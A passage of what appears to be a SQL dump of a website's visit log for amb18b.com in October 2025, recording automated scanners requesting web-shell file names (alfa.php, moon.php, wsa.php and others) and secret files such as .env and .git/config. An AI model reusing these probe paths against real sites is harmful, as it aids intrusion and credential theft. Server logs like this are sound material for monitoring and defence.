21:36:37'),(1073,'https://amb18b.com/app/','34.1.18.213','Direct Access',4,'2025-10-24 21:42:32','2025-10-24 21:41:57'),(1074,'https://amb18b.com/login/','34.1.18.213','Direct Access',4,'2025-10-24 21:42:34','2025-10-24 21:42:00'),(1075,'https://amb18b.com/app/','34.1.20.229','Direct Access',3,'2025-10-24 21:48:56','2025-10-24 21:48:41'),(1076,'https://amb18b.com/login/','34.1.20.229','Direct Access',3,'2025-10-24 21:49:00','2025-10-24 21:48:44'),(1077,'https://amb18b.com/app/','34.1.21.81','Direct Access',3,'2025-10-24 22:13:10','2025-10-24 22:12:51'),(1078,'https://amb18b.com/login/','34.1.21.81','Direct Access',3,'2025-10-24 22:13:12','2025-10-24 22:12:54'),(1079,'https://amb18b.com/ds.php','52.165.147.44','Direct Access',1,'2025-10-25 00:04:27','2025-10-25 00:04:27'),(1080,'https://amb18b.com/ioxi-o.php','52.165.147.44','Direct Access',1,'2025-10-25 00:04:31','2025-10-25 00:04:31'),(1081,'https://amb18b.com/moon.php','52.165.147.44','Direct Access',1,'2025-10-25 00:04:34','2025-10-25 00:04:34'),(1082,'https://amb18b.com/.git/config','93.123.109.7','Direct Access',1,'2025-10-25 00:52:42','2025-10-25 00:52:42'),(1083,'https://amb18b.com/wp-cli.php','194.87.76.127','Direct Access',1,'2025-10-25 03:49:02','2025-10-25 03:49:02'),(1084,'https://amb18b.com/wp-cli.phar','194.87.76.127','Direct Access',1,'2025-10-25 03:49:02','2025-10-25 03:49:02'),(1085,'https://amb18b.com/tinyfilemanager/tinyfilemanager.php','109.169.207.182','Direct Access',1,'2025-10-25 05:11:07','2025-10-25 05:11:07'),(1086,'https://amb18b.com/tinyfilemanager.php','109.169.207.182','Direct Access',1,'2025-10-25 05:11:07','2025-10-25 05:11:07'),(1087,'https://amb18b.com/.well-known/acme-challenge/','52.173.191.198','Direct Access',1,'2025-10-25 05:32:38','2025-10-25 05:32:38'),(1088,'https://amb18b.com/abcd.php','52.173.191.198','Direct Access',1,'2025-10-25 05:32:41','2025-10-25 05:32:41'),(1089,'https://amb18b.com/about.php?p=','52.173.191.198','Direct Access',1,'2025-10-25 05:32:43','2025-10-25 05:32:43'),(1090,'https://amb18b.com/chosen.php?p=','52.173.191.198','Direct Access',1,'2025-10-25 05:32:46','2025-10-25 05:32:46'),(1091,'https://amb18b.com/default.php','52.173.191.198','Direct Access',1,'2025-10-25 05:32:48','2025-10-25 05:32:48'),(1092,'https://amb18b.com/ds.php','52.173.191.198','Direct Access',1,'2025-10-25 05:32:51','2025-10-25 05:32:51'),(1093,'https://amb18b.com/f5.php','52.173.191.198','Direct Access',1,'2025-10-25 05:32:53','2025-10-25 05:32:53'),(1094,'https://amb18b.com/file.php','52.173.191.198','Direct Access',1,'2025-10-25 05:32:57','2025-10-25 05:32:57'),(1095,'https://amb18b.com/god4m.php','52.173.191.198','Direct Access',1,'2025-10-25 05:32:59','2025-10-25 05:32:59'),(1096,'https://amb18b.com/info.php','52.173.191.198','Direct Access',1,'2025-10-25 05:33:02','2025-10-25 05:33:02'),(1097,'https://amb18b.com/modules/','52.173.191.198','Direct Access',1,'2025-10-25 05:33:06','2025-10-25 05:33:06'),(1098,'https://amb18b.com/test1.php','52.173.191.198','Direct Access',1,'2025-10-25 05:33:10','2025-10-25 05:33:10'),(1099,'https://amb18b.com/uploads/','52.173.191.198','Direct Access',1,'2025-10-25 05:33:14','2025-10-25 05:33:14'),(1100,'https://amb18b.com/wp-admin/images/','52.173.191.198','Direct Access',1,'2025-10-25 05:33:17','2025-10-25 05:33:17'),(1101,'https://amb18b.com/mah.php','89.222.177.54','Direct Access',1,'2025-10-25 05:33:20','2025-10-25 05:33:20'),(1102,'https://amb18b.com/chosen.php','89.222.177.54','Direct Access',1,'2025-10-25 05:33:21','2025-10-25 05:33:21'),(1103,'https://amb18b.com/goods.php','89.222.177.54','Direct Access',1,'2025-10-25 05:33:21','2025-10-25 05:33:21'),(1104,'https://amb18b.com/wp-good.php','52.173.191.198','Direct Access',1,'2025-10-25 05:33:22','2025-10-25 05:33:22'),(1105,'https://amb18b.com/wp-includes/ID3/','52.173.191.198','Direct Access',1,'2025-10-25 05:33:25','2025-10-25 05:33:25'),(1106,'https://amb18b.com/wp-includes/Text/','52.173.191.198','Direct Access',1,'2025-10-25 05:33:28','2025-10-25 05:33:28'),(1107,'https://amb18b.com/wp-includes/assets/','52.173.191.198','Direct Access',1,'2025-10-25 05:33:30','2025-10-25 05:33:30'),(1108,'https://amb18b.com/wp-includes/js/codemirror/','52.173.191.198','Direct Access',1,'2025-10-25 05:33:32','2025-10-25 05:33:32'),(1109,'https://amb18b.com/wp-includes/js/crop/','52.173.191.198','Direct Access',1,'2025-10-25 05:33:34','2025-10-25 05:33:34'),(1110,'https://amb18b.com/wp-includes/pomo/','52.173.191.198','Direct Access',1,'2025-10-25 05:33:36','2025-10-25 05:33:36'),(1111,'https://amb18b.com/wp-includes/rest-api/fields/','52.173.191.198','Direct Access',1,'2025-10-25 05:33:40','2025-10-25 05:33:40'),(1112,'https://amb18b.com/.__info.php','52.173.191.198','Direct Access',1,'2025-10-25 05:33:43','2025-10-25 05:33:43'),(1113,'https://amb18b.com/0.php','52.173.191.198','Direct Access',1,'2025-10-25 05:33:46','2025-10-25 05:33:46'),(1114,'https://amb18b.com/07.php','52.173.191.198','Direct Access',1,'2025-10-25 05:33:49','2025-10-25 05:33:49'),(1115,'https://amb18b.com/1.php','52.173.191.198','Direct Access',1,'2025-10-25 05:33:53','2025-10-25 05:33:53'),(1116,'https://amb18b.com/123.php','52.173.191.198','Direct Access',1,'2025-10-25 05:33:55','2025-10-25 05:33:55'),(1117,'https://amb18b.com/aa.php','52.173.191.198','Direct Access',1,'2025-10-25 05:33:58','2025-10-25 05:33:58'),(1118,'https://amb18b.com/about.php','52.173.191.198','Direct Access',1,'2025-10-25 05:34:01','2025-10-25 05:34:01'),(1119,'https://amb18b.com/admin.php','52.173.191.198','Direct Access',1,'2025-10-25 05:34:03','2025-10-25 05:34:03'),(1120,'https://amb18b.com/adminfuns.php','52.173.191.198','Direct Access',1,'2025-10-25 05:34:06','2025-10-25 05:34:06'),(1121,'https://amb18b.com/akc.php','52.173.191.198','Direct Access',1,'2025-10-25 05:34:10','2025-10-25 05:34:10'),(1122,'https://amb18b.com/akcc.php','52.173.191.198','Direct Access',1,'2025-10-25 05:34:12','2025-10-25 05:34:12'),(1123,'https://amb18b.com/asasx.php','52.173.191.198','Direct Access',1,'2025-10-25 05:34:14','2025-10-25 05:34:14'),(1124,'https://amb18b.com/asd.php','52.173.191.198','Direct Access',1,'2025-10-25 05:34:16','2025-10-25 05:34:16'),(1125,'https://amb18b.com/atomlib.php','52.173.191.198','Direct Access',1,'2025-10-25 05:34:18','2025-10-25 05:34:18'),(1126,'https://amb18b.com/autoload_classmap.php','52.173.191.198','Direct Access',1,'2025-10-25 05:34:21','2025-10-25 05:34:21'),(1127,'https://amb18b.com/axx.php','52.173.191.198','Direct Access',1,'2025-10-25 05:34:23','2025-10-25 05:34:23'),(1128,'https://amb18b.com/berax.php','52.173.191.198','Direct Access',1,'2025-10-25 05:34:26','2025-10-25 05:34:26'),(1129,'https://amb18b.com/build.php','52.173.191.198','Direct Access',1,'2025-10-25 05:34:28','2025-10-25 05:34:28'),(1130,'https://amb18b.com/buy.php','52.173.191.198','Direct Access',1,'2025-10-25 05:34:30','2025-10-25 05:34:30'),(1131,'https://amb18b.com/checkbox.php','52.173.191.198','Direct Access',1,'2025-10-25 05:34:32','2025-10-25 05:34:32'),(1132,'https://amb18b.com/chosen.php','52.173.191.198','Direct Access',1,'2025-10-25 05:34:35','2025-10-25 05:34:35'),(1133,'https://amb18b.com/classwithtostring.php','52.173.191.198','Direct Access',1,'2025-10-25 05:34:37','2025-10-25 05:34:37'),(1134,'https://amb18b.com/cong.php','52.173.191.198','Direct Access',1,'2025-10-25 05:34:39','2025-10-25 05:34:39'),(1135,'https://amb18b.com/css.php','52.173.191.198','Direct Access',1,'2025-10-25 05:34:42','2025-10-25 05:34:42'),(1136,'https://amb18b.com/dropdown.php','52.173.191.198','Direct Access',1,'2025-10-25 05:34:44','2025-10-25 05:34:44'),(1137,'https://amb18b.com/edit.php','52.173.191.198','Direct Access',1,'2025-10-25 05:34:46','2025-10-25 05:34:46'),(1138,'https://amb18b.com/file2.php','52.173.191.198','Direct Access',1,'2025-10-25 05:34:48','2025-10-25 05:34:48'),(1139,'https://amb18b.com/file4.php','52.173.191.198','Direct Access',1,'2025-10-25 05:34:51','2025-10-25 05:34:51'),(1140,'https://amb18b.com/filemanager.php','52.173.191.198','Direct Access',1,'2025-10-25 05:34:53','2025-10-25 05:34:53'),(1141,'https://amb18b.com/flower.php','52.173.191.198','Direct Access',1,'2025-10-25 05:34:55','2025-10-25 05:34:55'),(1142,'https://amb18b.com/form.php','52.173.191.198','Direct Access',1,'2025-10-25 05:34:57','2025-10-25 05:34:57'),(1143,'https://amb18b.com/gecko.php','52.173.191.198','Direct Access',1,'2025-10-25 05:35:00','2025-10-25 05:35:00'),(1144,'https://amb18b.com/kyami.php','52.173.191.198','Direct Access',1,'2025-10-25 05:35:03','2025-10-25 05:35:03'),(1145,'https://amb18b.com/makeasmtp.php','52.173.191.198','Direct Access',1,'2025-10-25 05:35:05','2025-10-25 05:35:05'),(1146,'https://amb18b.com/manager.php','52.173.191.198','Direct Access',1,'2025-10-25 05:35:08','2025-10-25 05:35:08'),(1147,'https://amb18b.com/mari.php','52.173.191.198','Direct Access',1,'2025-10-25 05:35:10','2025-10-25 05:35:10'),(1148,'https://amb18b.com/moon.php','52.173.191.198','Direct Access',1,'2025-10-25 05:35:12','2025-10-25 05:35:12'),(1149,'https://amb18b.com/nc4.php','52.173.191.198','Direct Access',1,'2025-10-25 05:35:14','2025-10-25 05:35:14'),(1150,'https://amb18b.com/new.php','52.173.191.198','Direct Access',1,'2025-10-25 05:35:16','2025-10-25 05:35:16'),(1151,'https://amb18b.com/wp-admin.php','52.173.191.198','Direct Access',1,'2025-10-25 05:35:21','2025-10-25 05:35:21'),(1152,'https://amb18b.com/wp-trackback.php','52.173.191.198','Direct Access',1,'2025-10-25 05:35:24','2025-10-25 05:35:24'),(1153,'https://amb18b.com/xmrlpc.php','52.173.191.198','Direct Access',1,'2025-10-25 05:35:27','2025-10-25 05:35:27'),(1154,'https://amb18b.com/app/','34.1.19.77','Direct Access',3,'2025-10-25 06:31:10','2025-10-25 06:30:45'),(1155,'https://amb18b.com/login/','34.1.19.77','Direct Access',3,'2025-10-25 06:31:13','2025-10-25 06:30:48'),(1156,'https://amb18b.com/abcd.php','13.89.129.89','Direct Access',1,'2025-10-25 07:15:19','2025-10-25 07:15:19'),(1157,'https://amb18b.com/aa.php','13.89.129.89','Direct Access',1,'2025-10-25 07:15:21','2025-10-25 07:15:21'),(1158,'https://amb18b.com/about.php','13.89.129.89','Direct Access',1,'2025-10-25 07:15:25','2025-10-25 07:15:25'),(1159,'https://amb18b.com/admin.php','13.89.129.89','Direct Access',1,'2025-10-25 07:15:27','2025-10-25 07:15:27'),(1160,'https://amb18b.com/akc.php','13.89.129.89','Direct Access',1,'2025-10-25 07:15:28','2025-10-25 07:15:28'),(1161,'https://amb18b.com/alfa.php','13.89.129.89','Direct Access',1,'2025-10-25 07:15:31','2025-10-25 07:15:31'),(1162,'https://amb18b.com/asasx.php','13.89.129.89','Direct Access',1,'2025-10-25 07:15:33','2025-10-25 07:15:33'),(1163,'https://amb18b.com/atomlib.php','13.89.129.89','Direct Access',1,'2025-10-25 07:15:35','2025-10-25 07:15:35'),(1164,'https://amb18b.com/autoload_classmap.php','13.89.129.89','Direct Access',1,'2025-10-25 07:15:39','2025-10-25 07:15:39'),(1165,'https://amb18b.com/autoload_classmap/function.php','13.89.129.89','Direct Access',1,'2025-10-25 07:15:42','2025-10-25 07:15:42'),(1166,'https://amb18b.com/buy.php','13.89.129.89','Direct Access',1,'2025-10-25 07:15:45','2025-10-25 07:15:45'),(1167,'https://amb18b.com/chosen.php','13.89.129.89','Direct Access',1,'2025-10-25 07:15:48','2025-10-25 07:15:48'),(1168,'https://amb18b.com/classwithtostring.php','13.89.129.89','Direct Access',1,'2025-10-25 07:15:51','2025-10-25 07:15:51'),(1169,'https://amb18b.com/cong.php','13.89.129.89','Direct Access',1,'2025-10-25 07:15:55','2025-10-25 07:15:55'),(1170,'https://amb18b.com/edit.php','13.89.129.89','Direct Access',1,'2025-10-25 07:15:57','2025-10-25 07:15:57'),(1171,'https://amb18b.com/file.php','13.89.129.89','Direct Access',1,'2025-10-25 07:16:00','2025-10-25 07:16:00'),(1172,'https://amb18b.com/file2.php','13.89.129.89','Direct Access',1,'2025-10-25 07:16:02','2025-10-25 07:16:02'),(1173,'https://amb18b.com/flower.php','13.89.129.89','Direct Access',1,'2025-10-25 07:16:04','2025-10-25 07:16:04'),(1174,'https://amb18b.com/gecko.php','13.89.129.89','Direct Access',1,'2025-10-25 07:16:07','2025-10-25 07:16:07'),(1175,'https://amb18b.com/goat.php','13.89.129.89','Direct Access',1,'2025-10-25 07:16:09','2025-10-25 07:16:09'),(1176,'https://amb18b.com/goods.php','13.89.129.89','Direct Access',1,'2025-10-25 07:16:13','2025-10-25 07:16:13'),(1177,'https://amb18b.com/ioxi-o.php','13.89.129.89','Direct Access',1,'2025-10-25 07:16:18','2025-10-25 07:16:18'),(1178,'https://amb18b.com/lock360.php','13.89.129.89','Direct Access',1,'2025-10-25 07:16:23','2025-10-25 07:16:23'),(1179,'https://amb18b.com/makeasmtp.php','13.89.129.89','Direct Access',1,'2025-10-25 07:16:28','2025-10-25 07:16:28'),(1180,'https://amb18b.com/mm.php','13.89.129.89','Direct Access',1,'2025-10-25 07:16:31','2025-10-25 07:16:31'),(1181,'https://amb18b.com/nc4.php','13.89.129.89','Direct Access',1,'2025-10-25 07:16:34','2025-10-25 07:16:34'),(1182,'https://amb18b.com/tinyfilemanager.php','13.89.129.89','Direct Access',1,'2025-10-25 07:16:39','2025-10-25 07:16:39'),(1183,'https://amb18b.com/users.php','13.89.129.89','Direct Access',1,'2025-10-25 07:16:45','2025-10-25 07:16:45'),(1184,'https://amb18b.com/w.php','13.89.129.89','Direct Access',1,'2025-10-25 07:16:50','2025-10-25 07:16:50'),(1185,'https://amb18b.com/wp-admin/css/colors/blue/index.php','13.89.129.89','Direct Access',1,'2025-10-25 07:17:00','2025-10-25 07:17:00'),(1186,'https://amb18b.com/wp-admin/images/moon.php','13.89.129.89','Direct Access',1,'2025-10-25 07:17:05','2025-10-25 07:17:05'),(1187,'https://amb18b.com/wp-admin/js/index.php','13.89.129.89','Direct Access',1,'2025-10-25 07:17:13','2025-10-25 07:17:13'),(1188,'https://amb18b.com/wp-admin/setup-config.php','13.89.129.89','Direct Access',1,'2025-10-25 07:17:20','2025-10-25 07:17:20'),(1189,'https://amb18b.com/wp-api.php','13.89.129.89','Direct Access',1,'2025-10-25 07:17:26','2025-10-25 07:17:26'),(1190,'https://amb18b.com/wp-includes/IXR/autoload_classmap.php','13.89.129.89','Direct Access',1,'2025-10-25 07:17:34','2025-10-25 07:17:34'),(1191,'https://amb18b.com/wp-includes/fonts/admin.php','13.89.129.89','Direct Access',1,'2025-10-25 07:17:37','2025-10-25 07:17:37'),(1192,'https://amb18b.com/wp-includes/fonts/index.php','13.89.129.89','Direct Access',1,'2025-10-25 07:17:41','2025-10-25 07:17:41'),(1193,'https://amb18b.com/wp-setup.php','13.89.129.89','Direct Access',1,'2025-10-25 07:17:44','2025-10-25 07:17:44'),(1194,'https://amb18b.com/wp.php','13.89.129.89','Direct Access',1,'2025-10-25 07:17:46','2025-10-25 07:17:46'),(1195,'https://amb18b.com/wsa.php','13.89.129.89','Direct Access',1,'2025-10-25 07:17:48','2025-10-25 07:17:48'),(1196,'https://amb18b.com/payment/index.php','172.236.212.60','Direct Access',1,'2025-10-25 09:01:02','2025-10-25 09:01:02'),(1197,'https://amb18b.com/graphql','128.199.182.55','Direct Access',1,'2025-10-25 10:10:07','2025-10-25 10:10:07'),(1198,'https://amb18b.com/api','128.199.182.55','Direct Access',1,'2025-10-25 10:10:09','2025-10-25 10:10:09'),(1199,'https://amb18b.com/api/graphql','128.199.182.55','Direct Access',1,'2025-10-25 10:10:10','2025-10-25 10:10:10'),(1200,'https://amb18b.com/graphql/api','128.199.182.55','Direct Access',1,'2025-10-25 10:10:11','2025-10-25 10:10:11'),(1201,'https://amb18b.com/api/gql','128.199.182.55','Direct Access',1,'2025-10-25 10:10:12','2025-10-25 10:10:12'),(1202,'https://amb18b.com/swagger-ui.html','128.199.182.55','Direct Access',1,'2025-10-25 10:10:14','2025-10-25 10:10:14'),(1203,'https://amb18b.com/swagger/index.html','128.199.182.55','Direct Access',1,'2025-10-25 10:10:16','2025-10-25 10:10:16'),(1204,'https://amb18b.com/swagger/swagger-ui.html','128.199.182.55','Direct Access',1,'2025-10-25 10:10:17','2025-10-25 10:10:17'),(1205,'https://amb18b.com/webjars/swagger-ui/index.html','128.199.182.55','Direct Access',1,'2025-10-25 10:10:18','2025-10-25 10:10:18'),(1206,'https://amb18b.com/swagger.json','128.199.182.55','Direct Access',1,'2025-10-25 10:10:20','2025-10-25 10:10:20'),(1207,'https://amb18b.com/swagger/v1/swagger.json','128.199.182.55','Direct Access',1,'2025-10-25 10:10:21','2025-10-25 10:10:21'),(1208,'https://amb18b.com/v2/api-docs','128.199.182.55','Direct Access',1,'2025-10-25 10:10:22','2025-10-25 10:10:22'),(1209,'https://amb18b.com/@vite/env','128.199.182.55','Direct Access',1,'2025-10-25 10:10:23','2025-10-25 10:10:23'),(1210,'https://amb18b.com/v3/api-docs','128.199.182.55','Direct Access',1,'2025-10-25 10:10:24','2025-10-25 10:10:24'),(1211,'https://amb18b.com/actuator/env','128.199.182.55','Direct Access',1,'2025-10-25 10:10:24','2025-10-25 10:10:25'),(1212,'https://amb18b.com/server','128.199.182.55','Direct Access',1,'2025-10-25 10:10:25','2025-10-25 10:10:25'),(1213,'https://amb18b.com/.vscode/sftp.json','128.199.182.55','Direct Access',1,'2025-10-25 10:10:26','2025-10-25 10:10:26'),(1214,'https://amb18b.com/about','128.199.182.55','Direct Access',1,'2025-10-25 10:10:28','2025-10-25 10:10:28'),(1215,'https://amb18b.com/debug/default/view?panel=config','128.199.182.55','Direct Access',1,'2025-10-25 10:10:29','2025-10-25 10:10:29'),(1216,'https://amb18b.com/v2/_catalog','128.199.182.55','Direct Access',1,'2025-10-25 10:10:31','2025-10-25 10:10:31'),(1217,'https://amb18b.com/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application','128.199.182.55','Direct Access',1,'2025-10-25 10:10:32','2025-10-25 10:10:32'),(1218,'https://amb18b.com/server-status','128.199.182.55','Direct Access',1,'2025-10-25 10:10:33','2025-10-25 10:10:33'),(1219,'https://amb18b.com/login.action','128.199.182.55','Direct Access',1,'2025-10-25 10:10:34','2025-10-25 10:10:35'),(1220,'https://amb18b.com/_all_dbs','128.199.182.55','Direct Access',1,'2025-10-25 10:10:35','2025-10-25 10:10:35'),(1221,'https://amb18b.com/.DS_Store','128.199.182.55','Direct Access',1,'2025-10-25 10:10:37','2025-10-25 10:10:37'),(1222,'https://amb18b.com/.env','128.199.182.55','Direct Access',1,'2025-10-25 10:10:38','2025-10-25 10:10:38'),(1223,'https://amb18b.com/.git/config','128.199.182.55','Direct Access',1,'2025-10-25 10:10:38','2025-10-25 10:10:38'),(1224,'https://amb18b.com/s/7383e2934313e27363e2237313/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties','128.199.182.55','Direct Access',1,'2025-10-25 10:10:39','2025-10-25 10:10:39'),(1225,'https://amb18b.com/config.json','128.199.182.55','Direct Access',1,'2025-10-25 10:10:40','2025-10-25 10:10:40'),(1226,'https://amb18b.com/telescope/requests','128.199.182.55','Direct Access',1,'2025-10-25 10:10:41','2025-10-25 10:10:41'),(1227,'https://amb18b.com/info.php','128.199.182.55','Direct Access',1,'2025-10-25 10:10:41','2025-10-25 10:10:41'),(1228,'https://amb18b.com/?feed=rss2&p=1','54.39.210.235','Direct Access',1,'2025-10-25 12:13:16','2025-10-25 12:13:16'),(1229,'https://amb18b.com/.env','2001:41d0:a:432a::','Direct Access',1,'2025-10-25 13:10:06','2025-10-25 13:10:06'),(1230,'https://amb18b.com/core/.env','2001:41d0:a:432a::','Direct Access',1,'2025-10-25 13:10:07','2025-10-25 13:10:07'),(1231,'https://amb18b.com/.env.save','2001:41d0:a:432a::','Direct Access',1,'2025-10-25 13:10:08','2025-10-25 13:10:08'),(1232,'https://amb18b.com/.env','64.227.129.214','Direct Access',1,'2025-10-25 15:56:47','2025-10-25 15:56:47'),(1233,'https://amb18b.com/sitemap.txt','52.167.144.192','Direct Access',1,'2025-10-25 18:19:48','2025-10-25 18:19:48'),(1234,'https://amb18b.com/sitemap.txt','40.77.167.12','Direct Access',1,'2025-10-25 19:28:08','2025-10-25 19:28:08'),(1235,'https://amb18b.com/wp-cli.phar','46.8.62.104','Direct Access',1,'2025-10-25 19:49:02','2025-10-25 19:49:02'),(1236,'https://amb18b.com/wp-cli.php','46.8.62.104','Direct Access',1,'2025-10-25 19:49:03','2025-10-25 19:49:03'),(1237,'https://amb18b.com/app/','34.1.17.182','Direct Access',1,'2025-10-25 21:17:39','2025-10-25 21:17:39'),(1238,'https://amb18b.com/login/','34.1.17.182','Direct Access',1,'2025-10-25 21:17:46','2025-10-25 21:17:46'),(1239,'https://amb18b.com/app/','34.1.28.24','Direct Access',3,'2025-10-25 22:11:34','2025-10-25 22:11:22'),(1240,'https://amb18b.com/login/','34.1.28.24','Direct Access',3,'2025-10-25 22:11:35','2025-10-25 22:11:24'),(1241,'https://amb18b.com/app/','34.1.24.200','Direct Access',1,'2025-10-25 22:46:10','2025-10-25 22:46:10'),(1242,'https://amb18b.com/login/','34.1.24.200','Direct Access',1,'2025-10-25 22:46:12','2025-10-25 22:46:12'),(1243,'https://amb18b.com/index.php?author=2','20.203.75.63','https://amb18b.com',1,'2025-10-25 23:16:55','2025-10-25 23:16:55'),(1244,'https://amb18b.com/index.php?author=3','20.203.75.63','https://amb18b.com',1,'2025-10-25 23:16:56','2025-10-25 23:16:56'),(1245,'https://amb18b.com/app/','34.1.20.217','Direct Access',3,'2025-10-25 23:18:42','2025-10-25 23:18:27'),(1246,'https://amb18b.com/login/','34.1.20.217','Direct Access',3,'2025-10-25 23:18:44','2025-10-25 23:18:29'),(1247,'https://amb18b.com/app/','34.1.29.229','Direct Access',3,'2025-10-25 23:19:26','2025-10-25 23:19:01'),(1248,'https://amb18b.com/login/','34.1.29.229','Direct Access',3,'2025-10-25 23:19:29','2025-10-25 23:19:03'),(1249,'https://amb18b.com/app/','34.1.26.71','Direct Access',4,'2025-10-25 23:50:36','2025-10-25 23:50:20'),(1250,'https://amb18b.com/login/','34.1.26.71','Direct Access',4,'2025-10-25 23:50:38','2025-10-25 23:50:22'),(1251,'https://amb18b.com/.__info.php','52.173.191.198','Direct Access',1,'2025-10-25 23:55:44','2025-10-25 23:55:44'),(1252,'https://amb18b.com/0.php','52.173.191.198','Direct Access',1,'2025-10-25 23:55:46','2025-10-25 23:55:46'),(1253,'https://amb18b.com/07.php','52.173.191.198','Direct Access',1,'2025-10-25 23:55:49','2025-10-25 23:55:49'),(1254,'https://amb18b.com/1.php','52.173.191.198','Direct Access',1,'2025-10-25 23:55:51','2025-10-25 23:55:51'),(1255,'https://amb18b.com/123.php','52.173.191.198','Direct Access',1,'2025-10-25 23:55:53','2025-10-25 23:55:53'),(1256,'https://amb18b.com/aa.php','52.173.191.198','Direct Access',1,'2025-10-25 23:55:55','2025-10-25 23:55:55'),(1257,'https://amb18b.com/abcd.php','52.173.191.198','Direct Access',1,'2025-10-25 23:55:56','2025-10-25 23:55:56'),(1258,'https://amb18b.com/about.php','52.173.191.198','Direct Access',1,'2025-10-25 23:55:58','2025-10-25 23:55:58'),(1259,'https://amb18b.com/admin.php','52.173.191.198','Direct Access',1,'2025-10-25 23:56:00','2025-10-25 23:56:00'),(1260,'https://amb18b.com/adminfuns.php','52.173.191.198','Direct Access',1,'2025-10-25 23:56:02','2025-10-25 23:56:02'),(1261,'https://amb18b.com/akc.php','52.173.191.198','Direct Access',1,'2025-10-25 23:56:04','2025-10-25 23:56:04'),(1262,'https://amb18b.com/akcc.php','52.173.191.198','Direct Access',1,'2025-10-25 23:56:05','2025-10-25 23:56:05'),(1263,'https://amb18b.com/asasx.php','52.173.191.198','Direct Access',1,'2025-10-25 23:56:07','2025-10-25 23:56:07'),(1264,'https://amb18b.com/asd.php','52.173.191.198','Direct Access',1,'2025-10-25 23:56:09','2025-10-25 23:56:09'),(1265,'https://amb18b.com/atomlib.php','52.173.191.198','Direct Access',1,'2025-10-25 23:56:12','2025-10-25 23:56:12'),(1266,'https://amb18b.com/autoload_classmap.php','52.173.191.198','Direct Access',1,'2025-10-25 23:56:13','2025-10-25 23:56:13'),(1267,'https://amb18b.com/axx.php','52.173.191.198','Direct Access',1,'2025-10-25 23:56:15','2025-10-25 23:56:15'),(1268,'https://amb18b.com/berax.php','52.173.191.198','Direct Access',1,'2025-10-25 23:56:17','2025-10-25 23:56:17'),(1269,'https://amb18b.com/build.php','52.173.191.198','Direct Access',1,'2025-10-25 23:56:19','2025-10-25 23:56:19'),(1270,'https://amb18b.com/buy.php','52.173.191.198','Direct Access',1,'2025-10-25 23:56:21','2025-10-25 23:56:21'),(1271,'https://amb18b.com/checkbox.php','52.173.191.198','Direct Access',1,'2025-10-25 23:56:23','2025-10-25 23:56:23'),(1272,'https://amb18b.com/chosen.php','52.173.191.198','Direct Access',1,'2025-10-25 23:56:24','2025-10-25 23:56:24'),(1273,'https://amb18b.com/classwithtostring.php','52.173.191.198','Direct Access',1,'2025-10-25 23:56:27','2025-10-25 23:56:27'),(1274,'https://amb18b.com/cong.php','52.173.191.198','Direct Access',1,'2025-10-25 23:56:29','2025-10-25 23:56:29'),(1275,'https://amb18b.com/css.php','52.173.191.198','Direct Access',1,'2025-10-25 23:56:30','2025-10-25 23:56:30'),(1276,'https://amb18b.com/default.php','52.173.191.198','Direct Access',1,'2025-10-25 23:56:32','2025-10-25 23:56:32'),(1277,'https://amb18b.com/dropdown.php','52.173.191.198','Direct Access',1,'2025-10-25 23:56:34','2025-10-25 23:56:34'),(1278,'https://amb18b.com/ds.php','52.173.191.198','Direct Access',1,'2025-10-25 23:56:36','2025-10-25 23:56:36'),(1279,'https://amb18b.com/edit.php','52.173.191.198','Direct Access',1,'2025-10-25 23:56:38','2025-10-25 23:56:38'),(1280,'https://amb18b.com/f5.php','52.173.191.198','Direct Access',1,'2025-10-25 23:56:40','2025-10-25 23:56:40'),(1281,'https://amb18b.com/file.php','52.173.191.198','Direct Access',1,'2025-10-25 23:56:42','2025-10-25 23:56:42'),(1282,'https://amb18b.com/file2.php','52.173.191.198','Direct Access',1,'2025-10-25 23:56:44','2025-10-25 23:56:44'),(1283,'https://amb18b.com/file4.php','52.173.191.198','Direct Access',1,'2025-10-25 23:56:46','2025-10-25 23:56:46'),(1284,'https://amb18b.com/filemanager.php','52.173.191.198','Direct Access',1,'2025-10-25 23:56:47','2025-10-25 23:56:47'),(1285,'https://amb18b.com/flower.php','52.173.191.198','Direct Access',1,'2025-10-25 23:56:49','2025-10-25 23:56:49'),(1286,'https://amb18b.com/form.php','52.173.191.198','Direct Access',1,'2025-10-25 23:56:51','2025-10-25 23:56:51'),(1287,'https://amb18b.com/gecko.php','52.173.191.198','Direct Access',1,'2025-10-25 23:56:53','2025-10-25 23:56:53'),(1288,'https://amb18b.com/god4m.php','52.173.191.198','Direct Access',1,'2025-10-25 23:56:55','2025-10-25 23:56:55'),(1289,'https://amb18b.com/info.php','52.173.191.198','Direct Access',1,'2025-10-25 23:56:57','2025-10-25 23:56:57'),(1290,'https://amb18b.com/kyami.php','52.173.191.198','Direct Access',1,'2025-10-25 23:56:58','2025-10-25 23:56:58'),(1291,'https://amb18b.com/makeasmtp.php','52.173.191.198','Direct Access',1,'2025-10-25 23:57:01','2025-10-25 23:57:01'),(1292,'https://amb18b.com/manager.php','52.173.191.198','Direct Access',1,'2025-10-25 23:57:02','2025-10-25 23:57:02'),(1293,'https://amb18b.com/mari.php','52.173.191.198','Direct Access',1,'2025-10-25 23:57:05','2025-10-25 23:57:05'),(1294,'https://amb18b.com/moon.php','52.173.191.198','Direct Access',1,'2025-10-25 23:57:06','2025-10-25 23:57:06'),(1295,'https://amb18b.com/nc4.php','52.173.191.198','Direct Access',1,'2025-10-25 23:57:09','2025-10-25 23:57:09'),(1296,'https://amb18b.com/new.php','52.173.191.198','Direct Access',1,'2025-10-25 23:57:11','2025-10-25 23:57:11'),(1297,'https://amb18b.com/sallu.php','52.173.191.198','Direct Access',1,'2025-10-25 23:57:13','2025-10-25 23:57:13'),(1298,'https://amb18b.com/test1.php','52.173.191.198','Direct Access',1,'2025-10-25 23:57:15','2025-10-25 23:57:15'),(1299,'https://amb18b.com/wp-admin.php','52.173.191.198','Direct Access',1,'2025-10-25 23:57:19','2025-10-25 23:57:19'),(1300,'https://amb18b.com/wp-good.php','52.173.191.198','Direct Access',1,'2025-10-25 23:57:21','2025-10-25 23:57:21'),(1301,'https://amb18b.com/wp-trackback.php','52.173.191.198','Direct Access',1,'2025-10-25 23:57:24','2025-10-25 23:57:24'),(1302,'https://amb18b.com/xmrlpc.php','52.173.191.198','Direct Access',1,'2025-10-25 23:57:27','2025-10-25 23:57:27'),(1303,'https://amb18b.com/app/','34.1.18.17','Direct Access',3,'2025-10-26 01:12:03','2025-10-26 01:11:52'),(1304,'https://amb18b.com/login/','34.1.18.17','Direct 